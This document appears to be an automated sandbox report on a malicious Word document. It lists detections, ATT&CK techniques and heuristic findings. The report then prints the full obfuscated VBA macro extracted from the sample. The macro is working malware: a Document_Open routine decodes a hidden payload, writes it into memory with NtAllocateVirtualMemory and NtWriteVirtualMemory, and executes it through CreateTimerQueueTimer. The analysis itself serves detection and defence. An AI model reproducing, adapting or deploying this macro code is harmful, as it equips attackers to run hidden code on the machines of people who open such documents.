MALICIOUS
190
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to execute code. The presence of the 'GetObject' call and the ClamAV detection as 'Doc.Downloader.Macro' strongly suggest that the macro's primary function is to download and execute a secondary payload. No specific family could be identified, but the technique is consistent with macro-based malware delivery.
Heuristics 7
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set wdApp = GetObject(, "Word.Application") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() Dim compared As Byte -
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x40 bytes
Disassembly
Attempted x86 opcode disassembly0000180D 40 inc eax 0000180E 40 inc eax 0000180F 40 inc eax 00001810 40 inc eax 00001811 40 inc eax 00001812 40 inc eax 00001813 40 inc eax 00001814 40 inc eax 00001815 40 inc eax 00001816 40 inc eax 00001817 40 inc eax 00001818 40 inc eax 00001819 40 inc eax 0000181A 40 inc eax 0000181B 40 inc eax 0000181C 40 inc eax 0000181D 40 inc eax 0000181E 40 inc eax 0000181F 40 inc eax 00001820 40 inc eax 00001821 40 inc eax 00001822 40 inc eax 00001823 40 inc eax 00001824 40 inc eax 00001825 40 inc eax 00001826 40 inc eax 00001827 40 inc eax 00001828 40 inc eax 00001829 40 inc eax 0000182A 40 inc eax 0000182B 40 inc eax 0000182C 40 inc eax 0000182D 40 inc eax 0000182E 40 inc eax 0000182F 40 inc eax 00001830 40 inc eax 00001831 40 inc eax 00001832 40 inc eax 00001833 40 inc eax 00001834 40 inc eax 00001835 40 inc eax 00001836 40 inc eax 00001837 40 inc eax 00001838 40 inc eax 00001839 40 inc eax 0000183A 40 inc eax 0000183B 40 inc eax 0000183C 40 inc eax 0000183D 40 inc eax 0000183E 40 inc eax 0000183F 40 inc eax 00001840 40 inc eax 00001841 40 inc eax 00001842 40 inc eax 00001843 40 inc eax 00001844 40 inc eax 00001845 40 inc eax 00001846 40 inc eax 00001847 40 inc eax 00001848 40 inc eax 00001849 40 inc eax 0000184A 40 inc eax 0000184B 40 inc eax 0000184C 40 inc eax 0000184D 40 inc eax 0000184E 40 inc eax 0000184F 40 inc eax 00001850 40 inc eax 00001851 40 inc eax 00001852 40 inc eax 00001853 40 inc eax 00001854 40 inc eax 00001855 40 inc eax 00001856 40 inc eax 00001857 40 inc eax 00001858 40 inc eax 00001859 40 inc eax 0000185A 40 inc eax 0000185B 40 inc eax 0000185C 40 inc eax 0000185D 40 inc eax 0000185E 40 inc eax 0000185F 40 inc eax 00001860 40 inc eax 00001861 40 inc eax 00001862 40 inc eax 00001863 40 inc eax 00001864 40 inc eax 00001865 40 inc eax 00001866 40 inc eax 00001867 40 inc eax 00001868 40 inc eax 00001869 40 inc eax 0000186A 40 inc eax 0000186B 40 inc eax 0000186C 40 inc eax
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13686 bytes |
SHA-256: 61ee0c2ebe9de1fbabd7dcaba90f79efb4660873c7fcecb8a10b5928639d53f7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function matrimony(steroid, blenheim, bacchus)
Dim expropriation As Long
Dim machina As String
Dim putout As Long
Dim bowed As Variant
Dim ant As Long
Dim dredge As Long
Dim her As Long
Dim heathenism As Variant
Dim epispadias As Long
Dim recording As Long
Dim slagheap As Variant
anagram = "soonest"
fallacious = fallacious / 207
expropriation = steroid
epispadias = bacchus
ascetic = Fix(162)
ant = blenheim
jeremiah = 37 + 52
Pmt 0, jeremiah, 31081, 16262, 2
putting = putting
putout = 119 - 108 - 12
euronithopoda ByVal putout, expropriation, ant, epispadias, her
anagram = "doubt"
End Function
Sub SelectSentence()
Dim wdApp As Word.Application
Dim wdRng As Word.Range
Set wdApp = GetObject(, "Word.Application")
With wdApp.ActiveDocument
If .Paragraphs.Count >= 3 Then
Set wdRng = .Paragraphs(3).Range
wdRng.Copy
End If
End With
Worksheets("Sheet2").PasteSpecial
Worksheets("Sheet2").Paste Destination:=Worksheets("Sheet2").Range("A1")
Set wdApp = Nothing
Set wdRng = Nothing
End Sub
Private Sub Document_Open()
Dim compared As Byte
Dim allowed As Variant
quadrant = "chickadee"
plowshare = "bioclimatology"
reconversion
slenderly = 4 + 53
Pmt 0, slenderly, 14133, 23313, 4
End Sub
Sub reconversion()
Dim denizens As Byte
Dim awn As Long
viameter.mercy.Value = Day(#12/5/2013#)
varday = fled = "schmuck"
faineance = "colon"
adequate = "note"
mayhap = "embase"
impressionable = pathogenesis
progne = "obstante"
geraniales = unbridgeable
Set cheerlessly = viameter.mercy.SelectedItem
monomaniac = 11 + 53
Pmt 0, monomaniac, 38086, 29221, 3
defeasance = cheerlessly.Name
eversion = 72 - 70 + 7842
cretinism = Right(defeasance, eversion)
dismantled = featherbedding.megaloblast(cretinism)
translatable = 4 + 12
Pmt 0, translatable, 16658, 12444, 7
exporting = "dilated"
goodygoody = bevy
#If (80 - 22 + 342 + 94 - 90 + 296) > ((110 - 45 + 255) - (70 - 4 + 474) * 1) And ((68 - 85 + 45) - (51 - 19 - 4)) * 2 < (Win64) Then
Dim abudefduf As Integer
Dim broach As LongPtr
Dim lectin As LongPtr
Dim dicarboxylic As Integer
#ElseIf (55 - 31 + 376 + 52 - 38 + 286) > ((49 - 18 + 289) - (3 - 56 + 593) * 1) And Not ((34 - 13 + 7) - (86 - 61 + 3)) * 2 < (Win64) Then
Dim mailbag As Variant
Dim lectin As Long
Dim algonkian As Byte
Dim broach As Long
#End If
balustrade = 88 - 38 - 50
annexation = "aquating"
neofiber = "gamekeeper"
euge = 88 - 44 + 4052
cartilage = 7 + 43
Pmt 0, cartilage, 30796, 44183, 2
comprehend = menispermaceae
daviesia = "quaker"
activating = 35 + 21
Pmt 0, activating, 4967, 38250, 3
daygirl = dismantled
dracunculus = "disjunction"
broach = bondwoman(daygirl)
anemometry = "bullfinch"
fling = "region"
#If (117 - 121 + 404 + 9 - 28 + 319) > ((80 - 41 + 281) - (116 - 90 + 514) * 1) And ((31 - 82 + 79) - (24 - 118 + 122)) * 2 < (Win64) Then
Dim batholith As Variant
Dim circumfusion As LongPtr
Dim depressingly As LongPtr
Dim uprise As LongPtr
anamorphosis = 42 - 64 + 2086
#ElseIf (29 - 93 + 464 + 106 - 77 + 271) > ((66 - 24 + 278) - (5 - 82 + 617) * 1) And Not ((22 - 92 + 98) - (119 - 123 + 32)) * 2 < (Win64) Then
Dim circumfusion As Long
comate = 98 - 68 + 751
Dim depressingly As Long
Dim uprise As Long
anamorphosis = comate + 3459
#End If
Dim dismet As Variant
Dim anachronism As Long
circumfusion = 19 - 87 + 68
lectin = broach + anamorphosis
depressingly = 60 - 3 + 201470
uprise = 101 - 83 + 3482
cheap = confusing(depressingly, circumfusion, lectin, circumfusion, circumfusion, circumfusion, circumfusion)
phoradendron = 23 + 37
Pmt 0, phoradendron, 19060, 30074, 4
End Sub
Function bondwoman(biopsy)
Dim ailuropodidae As Variant
Dim ditchwater As Byte
Dim pahautea As Variant
Dim causeway As Long
#If (67 - 14 + 347 + 8 - 90 + 382) > ((26 - 119 + 413) - (6 - 104 + 638) * 1) And ((9 - 117 + 136) - (26 - 51 + 53)) * 2 < (Win64) Then
Dim arthrocentesis As Integer
Dim proximate As LongPtr
inflectional = 80 - 98 + 26
Dim misogyny As LongPtr
Dim endamage As Variant
Dim corruptly As Byte
Dim humbleness As LongPtr
Dim capo As Integer
compensate = VarPtr(proximate)
decollation = synapse(compensate, VarPtr(biopsy) + (9 - 85 + 84), inflectional)
#ElseIf (94 - 87 + 393 + 111 - 22 + 211) > ((19 - 81 + 382) - (89 - 14 + 465) * 1) And Not ((49 - 15 - 6) - (114 - 38 - 48)) * 2 < (Win64) Then
Dim proximate As Long
inflectional = 106 - 127 + 25
Dim misogyny As Long
Dim humbleness As Long
compensate = VarPtr(proximate)
decollation = matrimony(compensate, VarPtr(biopsy) + (117 - 44 - 65), inflectional)
#End If
oxybelis = 102 - 65 - 38
misogyny = 84 - 37 - 47
oceania = 1 - 40 + 39
humbleness = 102 - 89 + 9309
brownie = 76 - 106 + 4126
academician = 40 - 7 + 31
perpetuate = kyphosus(ByVal oxybelis, _
misogyny, ByVal oceania, humbleness, ByVal brownie, _
ByVal academician)
fallacious = Rnd(443)
anagram = "tungstate"
#If (124 - 128 + 404 + 89 - 92 + 303) > ((41 - 25 + 304) - (44 - 94 + 590) * 1) And ((37 - 72 + 63) - (109 - 65 - 16)) * 2 < (Win64) Then
although = synapse(misogyny, proximate, 75 - 10 + 5818)
#ElseIf (39 - 65 + 426 + 24 - 11 + 287) > ((27 - 99 + 392) - (40 - 50 + 550) * 1) And Not ((111 - 61 - 22) - (18 - 36 + 46)) * 2 < (Win64) Then
schistosome = matrimony(misogyny, proximate, 96 - 10 + 5797)
#End If
dactylopterus = 29 + 30
Pmt 0, dactylopterus, 13879, 11844, 4
bondwoman = misogyny
End Function
Function synapse(gout, alveolitis, wheeler)
Dim adjutant As String
Dim handbarrow As Integer
Dim glucocorticoid As LongPtr
Dim badlands As LongPtr
Dim tau As LongPtr
Dim overreaching As Integer
Dim arkansas As LongPtr
Dim aircraftsman As LongPtr
fallacious = Math.Round(451)
ascetic = Math.Round(199)
badlands = gout
aircraftsman = wheeler
fallacious = fallacious - 193
arkansas = alveolitis
periodontist = 39 + 35
Pmt 0, periodontist, 25883, 16910, 6
putting = "anticlimax"
glucocorticoid = 66 - 59 - 8
euronithopoda ByVal glucocorticoid, _
badlands, _
arkansas, aircraftsman, _
tau
putting = anagram
End Function
Attribute VB_Name = "featherbedding"
#If (58 - 39 + 381 + 95 - 15 + 220) > ((87 - 75 + 308) - (109 - 13 + 444) * 1) And ((30 - 119 + 117) - (19 - 116 + 125)) * 2 < (Win64) Then
Public Declare PtrSafe Function kyphosus _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (dura As LongPtr, boar As LongPtr, ByVal battleground As LongPtr,aerophagiaByVal As LongPtr, abstractedness As LongPtr, ByVal littleneck As LongPtr) As LongPtr
Public Declare PtrSafe Function confession _
Lib "Shlwapi " Alias _
"SleepConditionVariableSRW" (ByVal gurgoyle As Any, lacuslake As Any, appendicular As Any, disordered As Any) As LongPtr
Public Declare PtrSafe Function confusing _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (appointments As Any, ByVal randomize As Any, ByVal equitable As Any, ByVal lunchroom As Any, ByVal oversight As Any, ByVal trichechus As Any, ByVal beak As Any) As Long
Public Declare PtrSafe Function euronithopoda _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal theridiidae As Any, ByVal zetetic As Any, ByVal oscitant As Any, ByVal prelusive As Any, ByVal cunaxa As Any) As LongPtr
Public Declare PtrSafe Function aeschynanthus _
Lib "ntdll " Alias _
"AcquireSRWLockShared" (shabbiness As Any) As LongPtr
Public Declare PtrSafe Function salvager _
Lib "Shlwapi " Alias _
"GetOverlappedResult" (ByVal actinopoda As Any, quotation As Any, contestable As Any, scandalization As Any) As LongPtr
#ElseIf (122 - 103 + 381 + 76 - 128 + 352) > ((24 - 62 + 358) - (111 - 12 + 441) * 1) And Not ((73 - 82 + 37) - (119 - 107 + 16)) * 2 < (Win64) Then
Public Declare Function aeolian _
Lib "ntdll " Alias _
"AcquireSRWLockShared" (parkeriaceae As Any) As Long
Public Declare Function confusing _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (copperplate As Any, ByVal snug As Any, ByVal ratcatcher As Any, ByVal lucid As Any, ByVal ephedrine As Any, ByVal sulla As Any, ByVal learn As Any) As Long
Public Declare Function euronithopoda _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal gradations As Any, ByVal chimneysweeper As Any, ByVal explicatory As Any, ByVal monsignor As Any, ByVal dossier As Any) As Long
Public Declare Function vault _
Lib "Shlwapi " Alias _
"GetOverlappedResult" (ByVal chisel As Any, fiance As Any, mawkish As Any, napaea As Any) As Long
Public Declare Function nonexplosive _
Lib "Shlwapi " Alias _
"SleepConditionVariableSRW" (ByVal gestalt As Any, coverall As Any, areas As Any, agnize As Any) As Long
Public Declare Function kyphosus _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (antigenic As Long, plash As Long, ByVal acarpous As Long, countersignByVal As Long, stockcar As Long, ByVal prosit As Long) As Long
#End If
Function all(alcaid)
all = AscW(alcaid)
End Function
Function curculation()
Dim calcitic(255) As Byte
traitorous = 99 - 67 + 33
For i = traitorous To (78 - 65 + 78)
calcitic(traitorous) = traitorous - (52 - 83 + 96)
traitorous = traitorous + 1
If (116 - 69 + 44) < traitorous Then
milliammeter = camel + 40 - 29 + 54
Exit For
End If
diaskeaus = cordaitales + 50 - 22 + 37
Next
traitorous = (113 - 17 - 48)
For i = traitorous To (47 - 80 + 91)
calcitic(traitorous) = traitorous + (119 - 107 - 8)
traitorous = traitorous + 1
If (120 - 9 - 53) < traitorous Then
aware = millicurie + 47 - 72 + 90
Exit For
End If
methodist = dorm + 23 - 44 + 86
Next
traitorous = (35 - 96 + 158)
For i = traitorous To (6 - 77 + 194)
calcitic(traitorous) = traitorous - (51 - 108 + 128)
traitorous = traitorous + 1
subconsciously = less + 30 - 122 + 157
If (108 - 22 + 37) < traitorous Then
deific = demeaning + 103 - 53 + 15
Exit For
End If
guideline = actinomycin + 128 - 96 + 33
Next
calcitic(78 - 112 + 81) = (80 - 53 + 36)
traitorous = (94 - 123 + 72)
calcitic(traitorous) = (111 - 88 + 39)
curculation = calcitic
End Function
Function megaloblast(canteen) As String
Dim atharvaveda() As Byte
Dim downandout As Integer
Dim catalyst(63) As Long
anagram = "gesserit"
Dim outpouring As Long
Dim blut As Long
Dim saxe As String
Dim lamentably As Long
Dim asinorum As Long
Dim cheshire(63) As Long
Dim decursive(6962) As Byte
Dim astir(63) As Long
dryasdust = 20 - 76 + 258104
butyl = 35 - 92 + 312
Dim disobedience As Variant
asynchronism = 14 - 40 + 65562
malmsey = 97 - 119 + 85
musgu = 81 - 34 + 209
cyamopsis = 5 - 41 + 100
acalypha = 110 - 125 + 16515087
cladode = 48 - 36 + 262132
epanalepsis = 1 - 119 + 16711798
discoglossidae = 34 - 65 + 4127
Dim crossed As String
bollworm = 100 - 23 + 65203
dialogism = 126 - 111 + 4017
Dim nauran As Byte
Dim midiron As Integer
cyclades = 35 - 58 + 7866
Dim magnetohydrodynamics() As Byte
magnetohydrodynamics = VBA.StrConv(canteen, 120 + 8)
dandie = 22 + 1
Pmt 0, dandie, 39626, 46771, 4
decrement = 7843
dada = vbKeyShift - 12
For unangry = 0 To decrement
If unangry Mod 2 = 0 Then
magnetohydrodynamics(unangry) = magnetohydrodynamics(unangry) - dada
Else
magnetohydrodynamics(unangry) = magnetohydrodynamics(unangry) - (dada - 1)
End If
Next unangry
ectoplasm = 53 + 33
Pmt 0, ectoplasm, 38400, 18714, 6
downandout = 0
africanamerican = curculation
For blut = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
catalyst(blut) = colorimetric(blut, cyamopsis, 59)
astir(blut) = colorimetric(blut, discoglossidae, 59)
cheshire(blut) = colorimetric(blut, cladode, 59)
Next blut
boyishness = 1 + 35
Pmt 0, boyishness, 39686, 36044, 7
atharvaveda = magnetohydrodynamics
circumscribe = 103 - 70 - 29
boner = 55 + 4
Pmt 0, boner, 21726, 47023, 8
aller = 25 - 116 + 94
anagram = "chercher"
anagram = putting
halflight = aller + 1
cobbler = 57 - 101 + 46
For asinorum = 0 To decrement
drool = atharvaveda(asinorum)
herrerasaur = atharvaveda(asinorum + 2)
opiniative = astir(africanamerican(atharvaveda(asinorum + 1)))
dearborn = catalyst(africanamerican(herrerasaur)) + africanamerican(atharvaveda(asinorum + aller))
lamentably = cheshire(africanamerican(drool)) + opiniative + dearborn
blut = colorimetric(lamentably, epanalepsis, 51)
decursive(outpouring) = colorimetric(blut, asynchronism, 41)
blut = colorimetric(lamentably, bollworm, 51)
decursive(outpouring + 1) = colorimetric(blut, musgu, 41)
decursive(outpouring + cobbler) = colorimetric(lamentably, butyl, 51)
outpouring = outpouring + cobbler + 1
asinorum = asinorum + 3
Next
megaloblast = decursive
End Function
Function colorimetric(agraphic, nonruminant, dissociable)
Select Case dissociable
Case 41 + (10 / 2 - 5)
colorimetric = agraphic \ nonruminant
Case 51 + (5 - 3) / 2 - 1
colorimetric = agraphic And nonruminant
Case 59 + (56 / 7 - 4 * 2)
colorimetric = agraphic * nonruminant
End Select
End Function
Sub view()
Documents("Sample.doc").Windows(1).view.Type = wdNormalView
End Sub
Attribute VB_Name = "viameter"
Attribute VB_Base = "0{56806614-4AF4-4948-9366-C6CE73C03F2D}{6DE89D32-9A1A-4476-B691-E6905C185125}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.